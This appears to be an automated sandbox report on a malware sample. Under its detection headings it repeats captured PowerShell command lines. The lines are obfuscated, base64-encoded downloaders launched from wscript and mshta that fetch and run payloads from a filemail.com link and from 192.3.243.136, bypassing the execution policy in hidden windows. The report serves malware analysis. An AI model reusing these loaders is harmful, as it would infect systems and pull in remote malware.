Anti Malware Scan Interface: $Codigo = 'aWVYICggKCgnM1pEaW1hZ2VVcmwgPSBJdWFodHRwczovLzEwMTcuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWxla2V5PTJBYV9iV285UmV1NDV0N0JVMWtWZ3NkOXBUOXBnU1NsdlN0R3JuVElDZkZobVQnKydLJysnajNMQzZTUXRJY09jX1QzNXcmcGtfdmlkPWZkNGY2MTQnKydiYjIwJysnOWM2MmMxNzMwJysnOTQ1MTc2YTA5MCcrJzRmIEl1JysnYTszWkR3ZWJDbCcrJ2llbnQgPSBOZXctT2JqZWN0IFN5cycrJ3RlbS5OJysnZXQuV2ViQ2xpZW50OzNaRGltYWdlQnl0ZXMgPSAzWkR3ZWJDbGllbnQuRG93bmxvYWREYXRhKDNaRGltYWdlVXJsKTszWkRpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkcnKydldFN0cmluZycrJygzWkRpbWFnZUJ5dGVzKTszWkRzdGFydEZsJysnYWcgPSBJdWE8PEJBU0U2NF9TVEFSVD4+SXVhOzNaRGVuZEZsYWcgPSBJdWE8PEJBU0U2NF9FTkQ+Pkl1JysnYTszWkRzdGFydEluZGV4ID0gM1pEaW1hZ2UnKydUZXh0LkluZGV4T2YoM1pEc3RhcnRGbGFnKTszWkRlbmRJbmRleCA9IDNaRGltYWdlVGV4dC5JbmRleE9mKDNaRGVuZEZsJysnYWcpOzNaRHN0YXJ0SW5kZXggLWdlIDAgLWFuZCAzWkRlbmRJbmRleCAtZ3QgM1pEc3RhcnRJbmRleDszWkRzdGFydEluZGV4ICs9IDNaRHN0YXJ0RmxhZy5MZW5ndGg7M1pEYmFzZTY0TGVuZ3RoID0gM1onKydEZW5kSW5kZXggLSAzWkRzdGFydEluZGV4JysnOzNaJysnRGJhc2U2JysnNENvbW1hbmQgPSAzWkRpbWFnZVRleHQuU3Vic3RyaW5nKDNaRHN0YXJ0SW5kZXgsIDNaRGInKydhc2U2NExlbmcnKyd0aCk7M1pEYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoM1pEYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIHp3diBGb3JFYWNoLU9iamVjdCB7IDNaRF8gJysnfSlbLScrJzEuLi0oM1pEYmFzZTY0Q29tbWFuZC5MZW5ndCcrJ2gpXTszWkRjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKDNaRGJhc2U2NFJldmVyc2UnKydkKTszWkRsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGUnKydjdGlvbi5Bc3NlbWJseV06OkxvYWQoM1pEY29tbWFuZEJ5dGUnKydzKTszWkR2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZScrJ10uR2V0TWV0aG9kKEl1YVZBSUl1YSk7JysnM1pEdmFpTWV0aG9kLkludm9rZSgzWkRudWxsLCBAKEl1YXR4dC5LTEdPTC8zMy82MzEuMzQyLjMuMjkxLy86cCcrJ3R0aEl1YScrJywgSXVhZCcrJ2VzYXRpdmFkb0l1YSwgSXVhZGVzYXRpdmFkb0l1YSwgSXVhZGVzYXRpdicrJ2Fkb0l1YSwgSXVhYXNwbmV0X2NvbXBpbGVySXVhLCBJdWFkZXNhdGknKyd2YWRvSXVhLCBJdWFkZXNhdGl2YWRvSXVhLEl1JysnYWRlc2F0aXZhZG9JdWEsSXVhZGVzYXRpdmFkb0l1YSxJdWFkZXNhdGl2YWRvSXUnKydhLEl1YWRlc2F0aXZhZG9JdScrJ2EsSXVhZGVzYXRpdmFkb0l1YSxJJysndWExSXVhLEl1YWRlc2F0aXZhZG9JdWEpJysnKTsnKSAgLUNSZXBsYWNlKFtDaEFyXTczK1tDaEFyXTExNytbQ2hBcl05NyksW0NoQXJdMzkgLUNSZXBsYWNlKFtDaEFyXTUxK1tDaEFyXTkwK1tDaEFyXTY4KSxbQ2hBcl0zNi1DUmVwbGFjZSAgKFtDaEFyXTEyMitbQ2hBcl0xMTkrW0NoQXJdMTE4KSxbQ2hBcl0xMjQpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?

Obfuscated command line found

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "ieX ( (('3ZDimageUrl = Iuahttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmT'+'K'+'j3LC6SQtIcOc_T35w&pk_vid=fd4f614'+'bb20'+'9c62c1730'+'945176a090'+'4f Iu'+'a;3ZDwebCl'+'ient = New-Object Sys'+'tem.N'+'et.WebClient;3ZDimageBytes = 3ZDwebClient.DownloadData(3ZDimageUrl);3ZDimageText = [System.Text.Encoding]::UTF8.G'+'etString'+'(3ZDimageBytes);3ZDstartFl'+'ag = Iua<<BASE64_START>>Iua;3ZDendFlag = Iua<<BASE64_END>>Iu'+'a;3ZDstartIndex = 3ZDimage'+'Text.IndexOf(3ZDstartFlag);3ZDendIndex = 3ZDimageText.IndexOf(3ZDendFl'+'ag);3ZDstartIndex -ge 0 -and 3ZDendIndex -gt 3ZDstartIndex;3ZDstartIndex += 3ZDstartFlag.Length;3ZDbase64Length = 3Z'+'DendIndex - 3ZDstartIndex'+';3Z'+'Dbase6'+'4Command = 3ZDimageText.Substring(3ZDstartIndex, 3ZDb'+'ase64Leng'+'th);3ZDbase64Reversed = -join (3ZDbase64Command.ToCharArray() zwv ForEach-Object { 3ZD_ '+'})[-'+'1..-(3ZDbase64Command.Lengt'+'h)];3ZDcommandBytes = [System.Convert]::FromBase64String(3ZDbase64Reverse'+'d);3ZDloadedAssembly = [System.Refle'+'ction.Assembly]::Load(3ZDcommandByte'+'s);3ZDvaiMethod = [dnlib.IO.Home'+'].GetMethod(IuaVAIIua);'+'3ZDvaiMethod.Invoke(3ZDnull, @(Iuatxt.KLGOL/33/631.342.3.291//:p'+'tthIua'+', Iuad'+'esativadoIua, IuadesativadoIua, Iuadesativ'+'adoIua, Iuaaspnet_compilerIua, Iuadesati'+'vadoIua, IuadesativadoIua,Iu'+'adesativadoIua,IuadesativadoIua,IuadesativadoIu'+'a,IuadesativadoIu'+'a,IuadesativadoIua,I'+'ua1Iua,IuadesativadoIua)'+');') -CReplace([ChAr]73+[ChAr]117+[ChAr]97),[ChAr]39 -CReplace([ChAr]51+[ChAr]90+[ChAr]68),[ChAr]36-CReplace ([ChAr]122+[ChAr]119+[ChAr]118),[ChAr]124))"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "ieX ( (('3ZDimageUrl = Iuahttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmT'+'K'+'j3LC6SQtIcOc_T35w&pk_vid=fd4f614'+'bb20'+'9c62c1730'+'945176a090'+'4f Iu'+'a;3ZDwebCl'+'ient = New-Object Sys'+'tem.N'+'et.WebClient;3ZDimageBytes = 3ZDwebClient.DownloadData(3ZDimageUrl);3ZDimageText = [System.Text.Encoding]::UTF8.G'+'etString'+'(3ZDimageBytes);3ZDstartFl'+'ag = Iua<<BASE64_START>>Iua;3ZDendFlag = Iua<<BASE64_END>>Iu'+'a;3ZDstartIndex = 3ZDimage'+'Text.IndexOf(3ZDstartFlag);3ZDendIndex = 3ZDimageText.IndexOf(3ZDendFl'+'ag);3ZDstartIndex -ge 0 -and 3ZDendIndex -gt 3ZDstartIndex;3ZDstartIndex += 3ZDstartFlag.Length;3ZDbase64Length = 3Z'+'DendIndex - 3ZDstartIndex'+';3Z'+'Dbase6'+'4Command = 3ZDimageText.Substring(3ZDstartIndex, 3ZDb'+'ase64Leng'+'th);3ZDbase64Reversed = -join (3ZDbase64Command.ToCharArray() zwv ForEach-Object { 3ZD_ '+'})[-'+'1..-(3ZDbase64Command.Lengt'+'h)];3ZDcommandBytes = [System.Convert]::FromBase64String(3ZDbase64Reverse'+'d);3ZDloadedAssembly = [System.Refle'+'ction.Assembly]::Load(3ZDcommandByte'+'s);3ZDvaiMethod = [dnlib.IO.Home'+'].GetMethod(IuaVAIIua);'+'3ZDvaiMethod.Invoke(3ZDnull, @(Iuatxt.KLGOL/33/631.342.3.291//:p'+'tthIua'+', Iuad'+'esativadoIua, IuadesativadoIua, Iuadesativ'+'adoIua, Iuaaspnet_compilerIua, Iuadesati'+'vadoIua, IuadesativadoIua,Iu'+'adesativadoIua,IuadesativadoIua,IuadesativadoIu'+'a,IuadesativadoIu'+'a,IuadesativadoIua,I'+'ua1Iua,IuadesativadoIua)'+');') -CReplace([ChAr]73+[ChAr]117+[ChAr]97),[ChAr]39 -CReplace([ChAr]51+[ChAr]90+[ChAr]68),[ChAr]36-CReplace ([ChAr]122+[ChAr]119+[ChAr]118),[ChAr]124))"			Jump to behavior

PowerShell case anomaly found

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sySTeM32\wIndOWSpoweRShEll\V1.0\POwERsHeLl.EXE" "pOWersHELl -EX byPass -Nop -W 1 -C DEVICecrEdEntialDEploymenT ; invoke-eXPrEssIOn($(invOKE-eXPrEsSION('[sYStem.TEXt.ENcODiNg]'+[chAR]58+[ChAR]58+'UtF8.gETstrInG([sYstem.cONVErt]'+[cHAr]58+[ChAR]0x3a+'frOMBASE64STriNg('+[ChAr]34+'JHBmWHRRICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlcmRlRmluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpUa1puTFpUZ1RCLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxEQyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFwT1l2aWhjLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5qUmNkQ2pXKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiT3JjWUR2USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZXNwQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUEJvc0lTUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkcGZYdFE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMzL3NlZW15YmVzdHRoaW5nc3doaWNoY2FsbHlvdWJhYnlnaXJsd2hpY2hnaXZldWhvdGNoaWNrcy50SUYiLCIkRW5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2hpY2hjYWxseW91YmFieWdpcmx3aGljaGdpdmV1aC52YlMiLDAsMCk7U3RBUnQtU0xlRVAoMyk7SUVYICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxzZWVteWJlc3R0aGluZ3N3aGljaGNhbGx5b3ViYWJ5Z2lybHdoaWNoZ2l2ZXVoLnZiUyI='+[ChaR]34+'))')))"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sySTeM32\wIndOWSpoweRShEll\V1.0\POwERsHeLl.EXE" "pOWersHELl -EX byPass -Nop -W 1 -C DEVICecrEdEntialDEploymenT ; invoke-eXPrEssIOn($(invOKE-eXPrEsSION('[sYStem.TEXt.ENcODiNg]'+[chAR]58+[ChAR]58+'UtF8.gETstrInG([sYstem.cONVErt]'+[cHAr]58+[ChAR]0x3a+'frOMBASE64STriNg('+[ChAr]34+'JHBmWHRRICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlcmRlRmluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpUa1puTFpUZ1RCLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxEQyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFwT1l2aWhjLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5qUmNkQ2pXKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiT3JjWUR2USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZXNwQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUEJvc0lTUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkcGZYdFE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMzL3NlZW15YmVzdHRoaW5nc3doaWNoY2FsbHlvdWJhYnlnaXJsd2hpY2hnaXZldWhvdGNoaWNrcy50SUYiLCIkRW5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2hpY2hjYWxseW91YmFieWdpcmx3aGljaGdpdmV1aC52YlMiLDAsMCk7U3RBUnQtU0xlRVAoMyk7SUVYICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxzZWVteWJlc3R0aGluZ3N3aGljaGNhbGx5b3ViYWJ5Z2lybHdoaWNoZ2l2ZXVoLnZiUyI='+[ChaR]34+'))')))"			Jump to behavior

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sySTeM32\wIndOWSpoweRShEll\V1.0\POwERsHeLl.EXE" "pOWersHELl -EX byPass -Nop -W 1 -C DEVICecrEdEntialDEploymenT ; invoke-eXPrEssIOn($(invOKE-eXPrEsSION('[sYStem.TEXt.ENcODiNg]'+[chAR]58+[ChAR]58+'UtF8.gETstrInG([sYstem.cONVErt]'+[cHAr]58+[ChAR]0x3a+'frOMBASE64STriNg('+[ChAr]34+'JHBmWHRRICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlcmRlRmluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpUa1puTFpUZ1RCLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxEQyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFwT1l2aWhjLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5qUmNkQ2pXKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiT3JjWUR2USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZXNwQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUEJvc0lTUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkcGZYdFE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMzL3NlZW15YmVzdHRoaW5nc3doaWNoY2FsbHlvdWJhYnlnaXJsd2hpY2hnaXZldWhvdGNoaWNrcy50SUYiLCIkRW5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2hpY2hjYWxseW91YmFieWdpcmx3aGljaGdpdmV1aC52YlMiLDAsMCk7U3RBUnQtU0xlRVAoMyk7SUVYICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxzZWVteWJlc3R0aGluZ3N3aGljaGNhbGx5b3ViYWJ5Z2lybHdoaWNoZ2l2ZXVoLnZiUyI='+[ChaR]34+'))')))"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'aWVYICggKCgnM1pEaW1hZ2VVcmwgPSBJdWFodHRwczovLzEwMTcuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWxla2V5PTJBYV9iV285UmV1NDV0N0JVMWtWZ3NkOXBUOXBnU1NsdlN0R3JuVElDZkZobVQnKydLJysnajNMQzZTUXRJY09jX1QzNXcmcGtfdmlkPWZkNGY2MTQnKydiYjIwJysnOWM2MmMxNzMwJysnOTQ1MTc2YTA5MCcrJzRmIEl1JysnYTszWkR3ZWJDbCcrJ2llbnQgPSBOZXctT2JqZWN0IFN5cycrJ3RlbS5OJysnZXQuV2ViQ2xpZW50OzNaRGltYWdlQnl0ZXMgPSAzWkR3ZWJDbGllbnQuRG93bmxvYWREYXRhKDNaRGltYWdlVXJsKTszWkRpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkcnKydldFN0cmluZycrJygzWkRpbWFnZUJ5dGVzKTszWkRzdGFydEZsJysnYWcgPSBJdWE8PEJBU0U2NF9TVEFSVD4+SXVhOzNaRGVuZEZsYWcgPSBJdWE8PEJBU0U2NF9FTkQ+Pkl1JysnYTszWkRzdGFydEluZGV4ID0gM1pEaW1hZ2UnKydUZXh0LkluZGV4T2YoM1pEc3RhcnRGbGFnKTszWkRlbmRJbmRleCA9IDNaRGltYWdlVGV4dC5JbmRleE9mKDNaRGVuZEZsJysnYWcpOzNaRHN0YXJ0SW5kZXggLWdlIDAgLWFuZCAzWkRlbmRJbmRleCAtZ3QgM1pEc3RhcnRJbmRleDszWkRzdGFydEluZGV4ICs9IDNaRHN0YXJ0RmxhZy5MZW5ndGg7M1pEYmFzZTY0TGVuZ3RoID0gM1onKydEZW5kSW5kZXggLSAzWkRzdGFydEluZGV4JysnOzNaJysnRGJhc2U2JysnNENvbW1hbmQgPSAzWkRpbWFnZVRleHQuU3Vic3RyaW5nKDNaRHN0YXJ0SW5kZXgsIDNaRGInKydhc2U2NExlbmcnKyd0aCk7M1pEYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoM1pEYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIHp3diBGb3JFYWNoLU9iamVjdCB7IDNaRF8gJysnfSlbLScrJzEuLi0oM1pEYmFzZTY0Q29tbWFuZC5MZW5ndCcrJ2gpXTszWkRjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKDNaRGJhc2U2NFJldmVyc2UnKydkKTszWkRsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGUnKydjdGlvbi5Bc3NlbWJseV06OkxvYWQoM1pEY29tbWFuZEJ5dGUnKydzKTszWkR2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZScrJ10uR2V0TWV0aG9kKEl1YVZBSUl1YSk7JysnM1pEdmFpTWV0aG9kLkludm9rZSgzWkRudWxsLCBAKEl1YXR4dC5LTEdPTC8zMy82MzEuMzQyLjMuMjkxLy86cCcrJ3R0aEl1YScrJywgSXVhZCcrJ2VzYXRpdmFkb0l1YSwgSXVhZGVzYXRpdmFkb0l1YSwgSXVhZGVzYXRpdicrJ2Fkb0l1YSwgSXVhYXNwbmV0X2NvbXBpbGVySXVhLCBJdWFkZXNhdGknKyd2YWRvSXVhLCBJdWFkZXNhdGl2YWRvSXVhLEl1JysnYWRlc2F0aXZhZG9JdWEsSXVhZGVzYXRpdmFkb0l1YSxJdWFkZXNhdGl2YWRvSXUnKydhLEl1YWRlc2F0aXZhZG9JdScrJ2EsSXVhZGVzYXRpdmFkb0l1YSxJJysndWExSXVhLEl1YWRlc2F0aXZhZG9JdWEpJysnKTsnKSAgLUNSZXBsYWNlKFtDaEFyXTczK1tDaEFyXTExNytbQ2hBcl05NyksW0NoQXJdMzkgLUNSZXBsYWNlKFtDaEFyXTUxK1tDaEFyXTkwK1tDaEFyXTY4KSxbQ2hBcl0zNi1DUmVwbGFjZSAgKFtDaEFyXTEyMitbQ2hBcl0xMTkrW0NoQXJdMTE4KSxbQ2hBcl0xMjQpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "ieX ( (('3ZDimageUrl = Iuahttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmT'+'K'+'j3LC6SQtIcOc_T35w&pk_vid=fd4f614'+'bb20'+'9c62c1730'+'945176a090'+'4f Iu'+'a;3ZDwebCl'+'ient = New-Object Sys'+'tem.N'+'et.WebClient;3ZDimageBytes = 3ZDwebClient.DownloadData(3ZDimageUrl);3ZDimageText = [System.Text.Encoding]::UTF8.G'+'etString'+'(3ZDimageBytes);3ZDstartFl'+'ag = Iua<<BASE64_START>>Iua;3ZDendFlag = Iua<<BASE64_END>>Iu'+'a;3ZDstartIndex = 3ZDimage'+'Text.IndexOf(3ZDstartFlag);3ZDendIndex = 3ZDimageText.IndexOf(3ZDendFl'+'ag);3ZDstartIndex -ge 0 -and 3ZDendIndex -gt 3ZDstartIndex;3ZDstartIndex += 3ZDstartFlag.Length;3ZDbase64Length = 3Z'+'DendIndex - 3ZDstartIndex'+';3Z'+'Dbase6'+'4Command = 3ZDimageText.Substring(3ZDstartIndex, 3ZDb'+'ase64Leng'+'th);3ZDbase64Reversed = -join (3ZDbase64Command.ToCharArray() zwv ForEach-Object { 3ZD_ '+'})[-'+'1..-(3ZDbase64Command.Lengt'+'h)];3ZDcommandBytes = [System.Convert]::FromBase64String(3ZDbase64Reverse'+'d);3ZDloadedAssembly = [System.Refle'+'ction.Assembly]::Load(3ZDcommandByte'+'s);3ZDvaiMethod = [dnlib.IO.Home'+'].GetMethod(IuaVAIIua);'+'3ZDvaiMethod.Invoke(3ZDnull, @(Iuatxt.KLGOL/33/631.342.3.291//:p'+'tthIua'+', Iuad'+'esativadoIua, IuadesativadoIua, Iuadesativ'+'adoIua, Iuaaspnet_compilerIua, Iuadesati'+'vadoIua, IuadesativadoIua,Iu'+'adesativadoIua,IuadesativadoIua,IuadesativadoIu'+'a,IuadesativadoIu'+'a,IuadesativadoIua,I'+'ua1Iua,IuadesativadoIua)'+');') -CReplace([ChAr]73+[ChAr]117+[ChAr]97),[ChAr]39 -CReplace([ChAr]51+[ChAr]90+[ChAr]68),[ChAr]36-CReplace ([ChAr]122+[ChAr]119+[ChAr]118),[ChAr]124))"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sySTeM32\wIndOWSpoweRShEll\V1.0\POwERsHeLl.EXE" "pOWersHELl -EX byPass -Nop -W 1 -C DEVICecrEdEntialDEploymenT ; invoke-eXPrEssIOn($(invOKE-eXPrEsSION('[sYStem.TEXt.ENcODiNg]'+[chAR]58+[ChAR]58+'UtF8.gETstrInG([sYstem.cONVErt]'+[cHAr]58+[ChAR]0x3a+'frOMBASE64STriNg('+[ChAr]34+'JHBmWHRRICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlcmRlRmluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpUa1puTFpUZ1RCLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxEQyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFwT1l2aWhjLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5qUmNkQ2pXKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiT3JjWUR2USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZXNwQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUEJvc0lTUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkcGZYdFE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMzL3NlZW15YmVzdHRoaW5nc3doaWNoY2FsbHlvdWJhYnlnaXJsd2hpY2hnaXZldWhvdGNoaWNrcy50SUYiLCIkRW5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2hpY2hjYWxseW91YmFieWdpcmx3aGljaGdpdmV1aC52YlMiLDAsMCk7U3RBUnQtU0xlRVAoMyk7SUVYICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxzZWVteWJlc3R0aGluZ3N3aGljaGNhbGx5b3ViYWJ5Z2lybHdoaWNoZ2l2ZXVoLnZiUyI='+[ChaR]34+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 